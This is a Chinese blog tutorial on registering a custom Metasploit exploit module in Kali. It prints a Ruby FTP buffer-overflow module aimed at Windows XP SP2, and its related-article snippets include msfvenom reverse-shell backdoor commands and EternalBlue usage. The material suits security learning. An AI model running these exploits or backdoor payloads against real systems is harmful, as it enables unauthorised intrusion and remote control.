给kali的Metasploit下添加一个新的exploit

最新推荐文章于 2025-04-14 17:35:39 发布
最新推荐文章于 2025-04-14 17:35:39 发布
阅读量2.5w 收藏 11
点赞数 7
分类专栏: 漏洞挖掘 文章标签: 逆向 破解 rapid7
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/SilverMagic/article/details/40978081
版权
本文介绍如何在Metasploit中创建自定义的Exploit模块,并通过一个具体示例展示了编写过程及所需配置。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  • 首先在/usr/share/metasploit-framework/modules/exploits/目录下新建一个自定义文件夹,例如fwdtest


  • 仿造exploits目录下的其他exp(rb文件)编写自己的exp.rb脚本(这边用0day安全:软件漏洞分析技术里的一个栗子)

root@kali:/usr/share/metasploit-framework/modules/exploits/fwdtest# ls
0day1.rb
root@kali:/usr/share/metasploit-framework/modules/exploits/fwdtest# cat 0day1.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Ftp
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'security test',
      'Description'    => %q{
          This module exploits a buffer overflow.
      },
      'Author'         => 'fwd',
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 300,
          'BadChars' => "\x00",
        },
      'Platform' 		  => 'win',
      'Targets'        =>
        [
          [ 'Windows XP Pro SP2 English',           { 'Ret' => 0x7c809f83 } ],
        ]))
  end

  def exploit
    connect
    attack_buf =  'a'*200
    attack_buf += [target.ret].pack('V')
    attack_buf += payload.encoded
    sock.put(attack_buf)
    handler
    disconnect
  end
end
root@kali:/usr/share/metasploit-framework/modules/exploits/fwdtest#

  • 在控制台下启动metasploit


  • 在msf提示符下输入reload_all重新加载所有模块


  • 在msf提示符下输入use exploit/fwdtest/exp(输入的时候可以用tab补全,如果不能补全说明就有问题)


kali2020.3中安装windows-exploit-suggester-windows下辅助提权工具
weixin_45018333的博客
10-16 913
1.环境:kali2020.3 2.更新源: vim /etc/apt/sources.list 注意:要把原来官方的源注释掉# #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 deb http://mirrors.aliyun.com/kali
Kali linux 学习笔记(九十一)metasploit framework——exploit模块 2020.4.24
闵行小鱼塘
04-27 706
本节学习exploit模块
metasploit update exploit-db
weixin_30840573的博客
02-03 192
echo "Updating The Exploit-DB" cd /usr/share/exploitdb/ wget http://www.exploit-db.com/archive.tar.bz2 tar -xvjf /usr/share/exploitdb/archive.tar.bz2 rm /usr/share/exploitdb/archive.tar.bz2 echo ...
Metasploit Framework(MSF)实战宝典:从入门到精通的渗透测试全流程与案例解析 MSF简这个黑客利器工具
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
04-14 1017
Metasploit Framework(MSF)是一个开源的渗透测试框架,集成了漏洞利用代码(Exploit)、载荷(Payload)、辅助工具(Auxiliary)和后渗透模块(Post),被广泛应用于安全研究和渗透测试。MSF通过模块化设计,简化了漏洞利用和后渗透操作,帮助测试人员快速验证系统安全性。它是渗透测试领域的核心工具之一,理解其模块和使用流程是学习的关键。准备阶段安装并更新MSF,启动msfconsole。信息收集使用Auxiliary模块扫描目标。漏洞利用。
MetaSploit导入别人写的Metasploit类型的poc的正确姿势
Shaun_X
08-11 1720
需要注意以下三点: 1. 命名,不能用大写字母 像我这个,命名成D-Link_rce2.rb,含有D大写字母,就会导致该文件模块无法导入 2. 命名不能有"-"特殊字符 像我这个,命名成test-tset.rb,含有“-”特殊字符,就会导致该文件模块无法导入 3. 模块类名为MetasploitModule 一般Metasploit类型的poc,classname都是Metasploit3,...
kali metasploit 后渗透Post模块
qq_51685718的博客
10-28 474
如果是获取shell后权限是比较低的,post模块中有一个检测目标系统补丁然后会给出相应exp提权的功能。我这由于没安装火狐导致报错。
kali linux渗透攻击基于漏洞工具Metasploit
xiaoma920的博客
05-25 973
该文章只提供学习,禁止做违法的事情,任何后果与作者无关2.第二百八十五条第二款 违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 4383
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的端口号 执行后会在本地生成一个biyu.exe的文件 如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
渗透工具之Kali MSF(metasploit framework)使用
赤赤三的博客
03-20 5018
初识MSF(渗透测试开源软件平台,一个漏洞利用框架,对计算机软件漏洞进行攻击) Kali查找MSF框架:cd /usr/share/metasploit-framework,进入windows攻击模块:cd /usr/share/metasploit-framework/modules/exploits/windows 学习路线:MSF了解------>安装MSF2-Linux靶机------->MSF基本使用方法------>MSF实战:攻击win7主机并远程执行命令|扫描靶机my
kalimetasploit基本使用
Key_book(句芒安全实验室)
06-06 7043
metasploit简介 metasploit framework 简称 MSF. 是一个渗透攻击框架,可扩展.脚本使用ruby语言. 脚本以.rb做结尾. msf中集成了很多渗透攻击的脚本(.rb)/模块 下面介绍下在kali中简单的使用方法. MSF 的使用 命令行输入 msfconsole 进入metasploit MSF 的目录 /usr/share/met...
mad-metasploitMetasploit自定义模块,插件,资源脚本和很棒的metasploit集合
02-22
Metasploit自定义模块,插件,资源脚本和超棒的metasploit集合 惊人的 打开 将mad-metasploit添加metasploit框架 配置您的metasploit-framework目录 $ vim config/config.rb $metasploit_path = '/opt/metasploit-framework/embedded/framework/' # /usr/share/metasploit-framework 2-A。 互动模式 $ ./mad-metasploit 2-B。 命令行模式(全部预设) $ ./mad-metasploit [-a/-y/--all/--yes] 使用自定义模块 搜索辅助/漏洞,其他.. HAHWUL > search springboot Matching Modules
渗透工具——kali中msf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 9243
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
CVE-2017-7269使用教程(解决MSFCONSOLE解决无法加载模块问题)
旺仔Sec&blog
12-15 2295
问题如上 我们先把exp复制到msf目录下面,然后先尝试这打开msf看能不能使用 发现无法加载这个exp,接下来我们来查找问题 通过分析我们可以看到这里面的exp的格式都是下划线,我们试着把刚刚导入的exp也改成这个格式。 导入成功,接下来使用exp进行漏洞利用 漏洞利用成功 ...
Kali-利用metasploit中的exploit/multi/handler进行攻击
热门推荐
齐泽文的Blog
04-22 1万+
在攻击服务器上生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台root@qzwhost:~# msfconsole msfconsole &gt; use exploit/multi/handl...
kali linux之Msf-exploit模块,生成payload
weixin_30924239的博客
03-07 1606
Exploit模块 Active exploit(主动地向目标机器发送payload并执行,使目标交出shell(反连等)) msf5 > use exploit/windows/smb/psexec msf5 exploit(windows/smb/psexec) > set RHOST 192.168.1.13 msf5 exploit(windows/smb/pse...
Metasploit 完全指南(三)
龙哥盟
07-18 1226
在本章中,我们首先介绍了在 Metasploit 中编写利用程序的汇编基础知识,一般概念以及它们在利用中的重要性。我们深入讨论了基于堆栈的溢出、基于 SEH 的堆栈溢出以及绕过 DEP 等保护机制的细节。我们还介绍了 Metasploit 中各种方便的工具,以帮助利用过程。我们还看了坏字符和空间限制的重要性。现在,我们可以借助支持工具执行诸如在 Metasploit 中编写软件的利用之类的任务,确定必要的寄存器,覆盖它们的方法,并打败复杂的保护机制。
使用Kali上的Metasploit获取ssh登录到靶机权限
WEL测试
03-30 7500
前置条件 靶机:metasploitable2 靶机IP:192.168.88.137 初始密码是:msfadmin/msfadmin kali安装的镜像为:kali-linux-2019.1a-amd64.iso KaliIP为:192.168.88.132 使用Metasploit获取mysql登录密码 进入Metasploit的控制台执行命令: msfconsole ...
kali msf 添加路由
09-27
Kali Linux中的Metasploit Framework (MSF) 提供了一种名为exploitdb的模块库,其中包含各种漏洞利用脚本。当需要在攻击场景中添加路由以控制网络流量时,可以使用Meterpreter,这是一种由MSF生成的后渗透 shell,它支持网络操作。 要在Kali MSF中添加路由,通常通过Meterpreter的`route`命令行工具来完成,这个工具允许你管理网络路径。以下是步骤概述: 1. 首先,你需要通过MSF连接到目标系统并获取Meterpreter session。这通常是通过使用payloads(如Windows的 Meterpreter payload)来实现的。 2. 打开Meterpreter shell,输入以下命令(这里假设你想添加一条静态路由): ``` > route add [destination] [gateway] [interface] ``` 其中: - `[destination]`:你要路由的目标地址,例如 `192.168.0.0` 或者子网掩码形式如 `/24` - `[gateway]`:目标地址的网关,比如 `10.0.0.1` - `[interface]`:如果你想指定特定的网络接口(不是默认的),则提供该接口名称 3. 确认添加成功后,你可以通过运行 `> route -n` 来查看当前的路由表。 请注意,这种操作需要对网络环境有深入理解,并且需谨慎进行,因为它可能会干扰到正常的网络通信或违反法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值